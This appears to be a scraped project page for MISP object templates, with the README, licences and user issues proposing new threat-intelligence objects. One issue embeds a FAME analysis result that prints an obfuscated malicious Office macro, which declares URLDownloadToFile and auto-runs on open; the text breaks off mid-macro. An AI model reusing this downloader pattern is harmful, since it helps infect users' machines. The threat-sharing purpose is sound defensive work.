
misp-objects's Introduction

misp-objects


MISP objects are used in the MISP system and can be used by other information sharing tools. MISP objects complement MISP attributes by allowing advanced combinations of attributes. The creation of these objects and their associated attributes is based on real cyber security use-cases and existing practices in information sharing.

Feel free to propose your own MISP objects template to be included in MISP. The system is similar to the misp-taxonomies where anyone can contribute their own objects to be included in MISP without modifying software.

Format of MISP object template

An example of a MISP object template, 'domain-ip':

{
  "attributes": {
    "domain": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "Domain name",
      "misp-attribute": "domain",
      "multiple": true,
      "ui-priority": 1
    },
    "first-seen": {
      "description": "First time the tuple has been seen",
      "disable_correlation": true,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "ip": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "IP Address",
      "misp-attribute": "ip-dst",
      "multiple": true,
      "ui-priority": 1
    },
    "last-seen": {
      "description": "Last time the tuple has been seen",
      "disable_correlation": true,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "port": {
      "categories": [
        "Network activity",
        "External analysis"
      ],
      "description": "Associated TCP port with the domain",
      "misp-attribute": "port",
      "multiple": true,
      "ui-priority": 1
    },
    "registration-date": {
      "description": "Registration date of domain",
      "disable_correlation": false,
      "misp-attribute": "datetime",
      "ui-priority": 0
    },
    "text": {
      "description": "A description of the tuple",
      "disable_correlation": true,
      "misp-attribute": "text",
      "recommended": false,
      "ui-priority": 1
    }
  },
  "description": "A domain and IP address seen as a tuple in a specific time frame.",
  "meta-category": "network",
  "name": "domain-ip",
  "required": [
    "ip",
    "domain"
  ],
  "uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
  "version": 8
}

A MISP object is described in a simple JSON file containing the following elements.

  • name is the name of your object.
  • meta-category is the category the object falls into (such as file, network, financial, misc, internal...).
  • description is a summary of the object description.
  • version is the version number as a decimal value.
  • required is an array containing the minimal required attributes to describe the object.
  • requiredOneOf is an array containing the attributes where at least one needs to be present to describe the object.
  • attributes contains another JSON object listing all the attributes composing the object.

Each attribute must contain a reference misp-attribute to reference an existing attribute definition in MISP (MISP attribute types are case-sensitive). An array categories shall be used to describe which categories the attribute belongs to. The ui-priority describes the usage frequency of an attribute. This helps to display only the most frequently used attributes, while allowing advanced users to show all the attributes depending on their configuration. An optional multiple field shall be set to true if multiple elements of the same key can be used in the object. An optional values_list provides a list of values that can be selected as a value for an attribute. An optional sane_default provides a list of values recommended as potential sane defaults for an attribute. An optional disable_correlation boolean field suggests disabling correlation for a specific attribute. An optional to_ids boolean field disables the IDS flag of an attribute.

Existing MISP objects

MISP objects relationships

The MISP object model is open and allows users to define their own relationships. MISP provides a list of default relationships that can be used if you plan to share your events with other MISP communities.

  • relationships - list of predefined default relationships which can be used to link MISP objects together and explain the context of the relationship.

How to contribute MISP objects?

Fork the project, create a new directory in the objects directory matching your object name. Objects must be composed of existing MISP attributes. If you are missing any specific attributes, feel free to open an issue in the MISP project.

We recommend adding a text attribute to an object to allow users to add comments or correlate text.

If the unparsed object can be included, a raw-base64 attribute can be used in the object to import the whole object.

Every object needs a uuid, which can be created using uuidgen -r on a Linux command line.

When the object is created, run validate_all.sh and jq_all_the_things.sh for validation, then open a pull request on this project. We usually merge the objects if they fit existing use-cases.

Best practices when creating MISP object templates

  • Use lower-case names without underscore or special characters (except minus) for the field names
  • Add a description in the object template explaining the scope and use-cases of your object templates
  • If the object is the mapping of an existing format, add a reference into the description of the object template
  • first-seen and last-seen are not required in an object template as an object has those fields by default. If you need additional temporal information, add new specific field(s).
  • Be lax on the number of fields required by default (e.g. use requiredOneOf).
  • Review existing object templates before creating a new one. When doing a pull-request, don't hesitate to add the logic why a new template is required.
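The template elements and best practices described above can be checked mechanically before a pull request. The following Python linter is an added example, not part of the misp-objects repository or its validation scripts; `lint_template`, the `BROKEN` template and the `KNOWN_TYPES` subset (types that appear on this page) are assumptions made for illustration.

```python
import json
import re
import uuid

TOP_LEVEL = ("name", "meta-category", "description", "version", "uuid", "attributes")
# Best practice: lower-case names, no underscore or special characters except minus.
NAME_RE = re.compile(r"^[a-z0-9]+(-[a-z0-9]+)*$")
BOOL_FIELDS = ("multiple", "disable_correlation", "to_ids")
LIST_FIELDS = ("categories", "values_list", "sane_default")
IMPLICIT_FIELDS = ("first-seen", "last-seen")
# Subset of MISP attribute types, taken from the templates shown on this page.
# A real check would load the full type list of the MISP instance in use.
KNOWN_TYPES = frozenset({"domain", "ip-dst", "ip-src", "datetime", "port", "text"})


def lint_template(template, known_types=KNOWN_TYPES):
    """Return (errors, warnings) for one parsed MISP object template."""
    errors, warnings = [], []
    errors += [f"missing element: {k}" for k in TOP_LEVEL if k not in template]
    attributes = template.get("attributes")
    if not isinstance(attributes, dict) or not attributes:
        errors.append("attributes: must be a non-empty JSON object")
        attributes = {}
    if "uuid" in template:
        try:
            uuid.UUID(str(template["uuid"]))
        except ValueError:
            errors.append("uuid: not a valid UUID")
    # Assumption: "decimal value" is read as a positive integer, as in domain-ip.
    version = template.get("version")
    if "version" in template and (type(version) is not int or version < 1):
        errors.append("version: must be a positive integer")

    lowered = {t.lower(): t for t in known_types}
    for name, spec in attributes.items():
        if not NAME_RE.match(name):
            warnings.append(f"{name}: use lower-case letters, digits and '-' only")
        if name in IMPLICIT_FIELDS:
            warnings.append(f"{name}: objects carry this field by default")
        if not isinstance(spec, dict):
            errors.append(f"{name}: definition must be a JSON object")
            continue
        mtype = spec.get("misp-attribute")
        if mtype is None:
            errors.append(f"{name}: missing misp-attribute")
        elif not isinstance(mtype, str) or mtype not in known_types:
            # Attribute types are case-sensitive: point at a near miss if any.
            hint = lowered.get(str(mtype).lower())
            detail = f" (types are case-sensitive, did you mean '{hint}'?)" if hint else ""
            errors.append(f"{name}: unknown misp-attribute '{mtype}'{detail}")
        for field in BOOL_FIELDS + LIST_FIELDS:
            want = bool if field in BOOL_FIELDS else list
            if field in spec and not isinstance(spec[field], want):
                errors.append(f"{name}: {field} must be of type {want.__name__}")

    # required / requiredOneOf may only name attributes the template defines.
    for key in ("required", "requiredOneOf"):
        members = template.get(key, [])
        if not isinstance(members, list):
            errors.append(f"{key}: must be an array")
            continue
        for member in members:
            if not isinstance(member, str) or member not in attributes:
                errors.append(f"{key}: '{member}' is not defined in attributes")
    return errors, warnings


# Trimmed copy of the domain-ip template shown on this page.
DOMAIN_IP = json.loads("""{
  "attributes": {
    "domain": {"categories": ["Network activity", "External analysis"],
      "description": "Domain name", "misp-attribute": "domain",
      "multiple": true, "ui-priority": 1},
    "first-seen": {"description": "First time the tuple has been seen",
      "disable_correlation": true, "misp-attribute": "datetime", "ui-priority": 0},
    "ip": {"categories": ["Network activity", "External analysis"],
      "description": "IP Address", "misp-attribute": "ip-dst",
      "multiple": true, "ui-priority": 1}
  },
  "description": "A domain and IP address seen as a tuple in a specific time frame.",
  "meta-category": "network", "name": "domain-ip", "required": ["ip", "domain"],
  "uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734", "version": 8
}""")

# Constructed template with deliberate mistakes (not a real MISP object).
BROKEN = {
    "name": "example-session", "meta-category": "network",
    "description": "Constructed sample for the linter",
    "version": "1", "uuid": "not-a-uuid",
    "requiredOneOf": ["src_ip", "username"],
    "attributes": {
        "src_ip": {"misp-attribute": "IP-SRC", "multiple": "true"},
        "message": {"description": "no type given"},
    },
}

if __name__ == "__main__":
    for label, tpl in (("domain-ip", DOMAIN_IP), ("broken", BROKEN)):
        errs, warns = lint_template(tpl)
        print(label, "errors:", errs, "warnings:", warns)
```

Errors are violations of the format rules; warnings only reflect the best-practice list, which is why the page's own domain-ip template passes with a note about first-seen.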

MISP objects documentation

The MISP objects are documented at the following location in HTML and PDF.

The documentation is automatically generated from the MISP objects template expressed in JSON.

What are the advantages of MISP objects versus existing standards?

MISP objects are dynamically used objects that are contributed by users of MISP (the threat sharing platform) or other information sharing platforms.

The aim is to allow a dynamic update of object definitions in operational distributed sharing systems like MISP. Security threats and their related indicators are quite dynamic, whereas standardized formats are quite static, and new indicators require significant time before being standardized.

The MISP object model allows for adding new combined indicator formats based on their usage without changing the underlying code base of MISP or other threat sharing platforms using it. The definition of the objects can then be propagated along with the indicators themselves.

License

MISP Object JSON files

The MISP objects (JSON files) are dual-licensed under:

or

 Copyright (c) 2016-2024 Alexandre Dulaunoy - [email protected]
 Copyright (c) 2016-2024 CIRCL - Computer Incident Response Center Luxembourg
 Copyright (c) 2016-2024 Andras Iklody
 Copyright (c) 2016-2024 Raphael Vinot
 Copyright (c) 2016-2024 Christian Studer
 Copyright (c) 2016-2024 Various contributors to MISP Project

 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:

    1. Redistributions of source code must retain the above copyright notice,
       this list of conditions and the following disclaimer.
    2. Redistributions in binary form must reproduce the above copyright notice,
       this list of conditions and the following disclaimer in the documentation
       and/or other materials provided with the distribution.

 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
 LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
 OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 OF THE POSSIBILITY OF SUCH DAMAGE.

If a specific author of a taxonomy wants to license it under a different license, a pull request can be requested.

Software


Copyright (C) 2016-2024 Andras Iklody
Copyright (C) 2016-2024 Alexandre Dulaunoy
Copyright (C) 2016-2024 CIRCL - Computer Incident Response Center Luxembourg

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU Affero General Public License for more details.

You should have received a copy of the GNU Affero General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.

misp-objects's People

Contributors

adulau, aks6193, ater49, c-goes, c00kie-, chrisr3d, cudeso, cvandeplas, davidcruciani, delta-sierra, digitalleukocyte, ecrimelabs, gallypette, goodlandsecurity, haxpak, iglocska, kx1499, kx499, matthijsvp, mfaou, rafiot, righel, rommelfs, samitainio, steveclement, terrtia, theobarrague, vvx7, wachizungu, yodresh


misp-objects's Issues

sandbox-signature

I see there is a sandbox-report object where it is possible to load the raw output from a sandbox, but there isn't a tiny object such as sandbox-signature where one can put the signatures that are matching (like the av-signature object).
Example of signatures:
image

json of signatures:
image

At least to have the description and the name, with data (also if is interesting) object will go wider.
I'm wondering something like this definition.json:
image

What do you think?

x509 add fields (certigo)

The Certigo tool can dump certificate information to JSON format.
It would be nice if we had more fields in x509 according to this tool.
You can find an example of a .json dumped by certigo:
dumped-json.txt

Some interesting fields are:

  • is_self_signed (boolean)
  • is_ca (boolean)
  • pem
  • dns_names (multiple)
  • key_usage (multiple). E.g. Digital Signature
  • extended_key_usage (multiple). E.g. Server auth
  • ocsp_server
  • issuing_certificate

The Subject field and Issuer field are subdivided according to RFC 5280 (page 20) like this:

  • common_name
  • country
  • organization
  • organizational unit
  • distinguished name qualifier
  • state or province name
  • serial number
  • locality
  • title
  • surname
  • given name
  • initials
  • pseudonym
  • generation qualifier
  • key_id

Two solutions. The first one is to rename the existing fields to "subject-common-name", "subject-country", "issuer-common-name", "issuer-country", etc.
The second is to create an object "subject" and "issuer" with these attributes. I don't know which is best :)

Cowrie honeypot object

Cowrie honeypot object first version released.

Object attribute   MISP attribute type   Description                                      Disable correlation
message            text                  Message of the cowrie honeypot
username           text                  Username related to the password(s)
protocol           text                  Protocol used in the cowrie honeypot
src_ip             ip-src                Source IP address of the session
eventid            text                  Eventid of the session in the cowrie honeypot
dst_ip             ip-dst                Destination IP address of the session
session            text                  Session id
system             text                  System origin in cowrie honeypot
src_port           port                  Source port of the session
timestamp          datetime              When the event happened
sensor             text                  Cowrie sensor name
passsword          text                  Password
isError            text                  isError
dst_port           port                  Destination port of the session

https://www.misp-project.org/objects.html#_cowrie

Based on the following discussion on Twitter, we might need to update the object to support collected malware samples and SSH meta information.

Script object template

Script object template - to store extracted evidence where a script is involved (from PowerShell to bash) and allow to trace timelines with the object relationship and maybe extend MISP to have syntax highlighting for such object.

Volatility - objects

mutantscan

JSON export field name

"columns": [
    "Offset(P)",
    "Pointers",
    "Handles",
    "Signal",
    "Thread",
    "CID",
    "Name"
  ]
[33379968, 1, 1, "1", 0, "", ""], [33382448, 2, 1, "1", 0, "", "746bbf3569adEncrypt"], [33387864, 1, 1, "1", 0, "", ""], [33394584, 1, 1, "1", 0, "", ""], [33427592, 2, 1, "1", 0, "", "_SHuassist.mtx"]

SSDT

  "columns": [
    "Table",
    "TableOffset",
    "NumEntries",
    "Entry",
    "Addr",
    "Function",
    "Owner"
  ]
[
      "SSDT[1]",
      3214515072,
      667,
      4761,
      3214226858,
      "NtGdiUMPDEngFreeUserMem",
      "win32k.sys"
    ],
    [
      "SSDT[1]",
      3214515072,
      667,
      4762,
      3212932649,
      "NtGdiDrawStream",
      "win32k.sys"
    ]

modules

 "columns": [
    "Offset(V)",
    "Name",
    "Base",
    "Size",
    "File"
  ]
   [
      2182709560,
      "ParVdm.SYS",
      4173201408,
      8192,
      "\\SystemRoot\\System32\\Drivers\\ParVdm.SYS"
    ],
    [
      2183500848,
      "srv.sys",
      4152414208,
      335872,
      "\\SystemRoot\\system32\\DRIVERS\\srv.sys"
    ],
    [
      2182893856,
      "HTTP.sys",
      4150018048,
      266240,
      "\\SystemRoot\\System32\\Drivers\\HTTP.sys"
    ]

connscan

{
  "rows": [
    [
      34108960,
      "172.16.112.128:1038",
      "41.168.5.140:8080",
      1484
    ],
    [
      37388296,
      "172.16.112.128:1037",
      "125.19.103.198:8080",
      1484
    ]
  ],
  "columns": [
    "Offset(P)",
    "LocalAddress",
    "RemoteAddress",
    "PID"
  ]
}

This one can be easily mapped to netflow object.

FAME format

{
  "analysis": {
    "support_files": {},
    "logs": [
      "2017-03-24 11:17: debug: Trying to queue module 'apk'",
      "2017-03-24 11:17: debug: Trying to queue module 'eml'",
      "2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
      "2017-03-24 11:17: debug: Trying to queue module 'pdf'",
      "2017-03-24 11:17: debug: Trying to queue module 'zip'",
      "2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
      "2017-03-24 11:17: debug: Trying to run office_macros",
      "2017-03-24 11:17: debug: Done with office_macros"
    ],
    "extractions": [],
    "results": {
      "office_macros": {
        "macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n    Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n    Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN 
As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 
17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim 
nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul 
As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As 